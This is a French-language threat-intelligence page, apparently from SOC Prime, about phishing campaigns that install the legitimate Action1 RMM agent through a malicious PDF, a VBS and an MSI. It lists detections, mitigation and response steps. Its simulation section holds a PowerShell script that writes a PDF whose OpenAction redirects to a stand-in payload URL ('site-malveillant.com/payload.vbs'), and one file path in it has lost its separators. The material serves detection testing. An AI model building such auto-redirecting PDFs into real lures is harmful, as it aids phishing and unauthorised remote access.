SOC Prime Bias: High

06 Oct 2026 14:36 UTC

L’abus des outils RMM continue de croître dans les campagnes de menaces actives

Author Photo
SOC Prime Team linkedin icon Suivre
L’abus des outils RMM continue de croître dans les campagnes de menaces actives
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Résumé

Les acteurs malveillants abusent des outils de gestion et de surveillance à distance (RMM), en particulier Action1, pour établir un accès persistant dans des environnements compromis. L’attaque commence par un e-mail de phishing contenant un fichier PDF malveillant qui redirige les victimes vers un fichier VBS. Le script télécharge ensuite et installe un paquet MSI contenant l’agent Action1 légitime, permettant un accès à distance non autorisé.

Enquête

L’enquête a révélé un PDF malveillant utilisant les mots-clés OpenAction et URI pour initier un téléchargement à partir d’une URL hébergée par Vercel. L’analyse du paquet MSI récupéré a révélé que des fichiers légitimes d’Action1 Corporation étaient détournés via l’infrastructure cloud du fournisseur. L’agent installé contient un CustomerID spécifique et communique avec un domaine légitime d’Action1.

Atténuation

Les organisations devraient configurer le filtrage des e-mails pour identifier les structures PDF suspectes contenant des mots-clés OpenAction ou URI. Les équipes de sécurité devraient surveiller les installations non autorisées d’outils RMM et la création du service A1Agent. Bloquer les connexions à une infrastructure cloud RMM inattendue et identifier les CustomerID inhabituels ou non autorisés peut également réduire le risque d’abus d’accès à distance.

Réponse

Lorsqu’une activité RMM malveillante est détectée, isolez l’hôte affecté pour empêcher toute exécution de commande distante supplémentaire. Enquêtez l’e-mail de phishing d’origine et effectuez une analyse médico-légale des fichiers VBS et MSI associés. Révoquez les identifiants potentiellement compromis et examinez les configurations de l’agent Action1 pour détecter des indicateurs d’accès à distance non autorisé ou de persistance.

Flux d’Attaque

Nous mettons encore à jour cette partie.

Détections

LOLBAS WScript/CScript (via process_creation)

Équipe SOC Prime
06 oct. 2026

Logiciels alternatifs de gestion/accès à distance (via process_creation)

Équipe SOC Prime
06 oct. 2026

Possibilité d’infiltration/exfiltration de données/C2 via des services/outils tiers (via proxy)

Équipe SOC Prime
06 oct. 2026

Possibilité d’infiltration/exfiltration de données/C2 via des services/outils tiers (via dns)

Équipe SOC Prime
06 oct. 2026

Activité possible de commande et de contrôle par tentative de communication de domaine de logiciel d’accès à distance (via dns)

Équipe SOC Prime
06 oct. 2026

IOCs (HashSha256) pour détecter : Plus d’outils RMM dans la nature

Règles SOC Prime AI
06 oct. 2026

Connexion à distance aux serveurs d’entreprise Action1 [Connexion réseau Windows]

Règles SOC Prime AI
06 oct. 2026

PDF OpenAction et redirection URI vers VBS malveillant [Événement de fichier Windows]

Règles SOC Prime AI
06 oct. 2026

Exécution de simulation

  • Narration de l’attaque et commandes : L’adversaire simule une campagne de phishing. Le but est de livrer un fichier nommé Reçu de transaction .pdf à une victime. Le PDF est spécialement conçu pour que dès que l’utilisateur l’ouvre, la commande /OpenAction déclenche une /URI redirection. Cette redirection est destinée à conduire l’utilisateur vers un site qui sert un VBScript malveillant. Pour déclencher la règle de détection spécifique fournie, nous créerons un fichier avec le nom exact et les chaînes internes requises.

  • Script de test de régression :

    # Script de simulation : Déclenchement de la détection PDF OpenAction
    $targetFile = "$env:USERPROFILEDesktopReçu de Transaction .pdf"
    
    # Création du contenu PDF "malveillant" pour correspondre aux mots-clés de détection
    $pdfContent = @"
    %PDF-1.1
    1 0 obj
    << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://site-malveillant.com/payload.vbs) >> >>
    endobj
    2 0 obj
    << /Type /Pages /Parent 1 0 R /Count 1 >>
    endobj
    trailer
    << /Root 1 0 R >>
    %%EOF
    "@
    
    # Écriture du fichier sur le disque pour déclencher la détection 'file_event'
    $pdfContent | Out-File -FilePath $targetFile -Encoding ascii
    
    Write-Host "Fichier de simulation créé à : $targetFile"
    Write-Host "Vérifiez votre SIEM pour l'alerte de détection."
  • Commandes de nettoyage :

    # Nettoyage : Supprimer le fichier malveillant simulé
    $targetFile = "$env:USERPROFILEDesktopReçu de Transaction .pdf"
    if (Test-Path $targetFile) {
        Remove-Item -Path $targetFile -Force
        Write-Host "Nettoyage terminé : $targetFile supprimé."
    } else {
        Write-Host "Nettoyage : Fichier non trouvé."
    }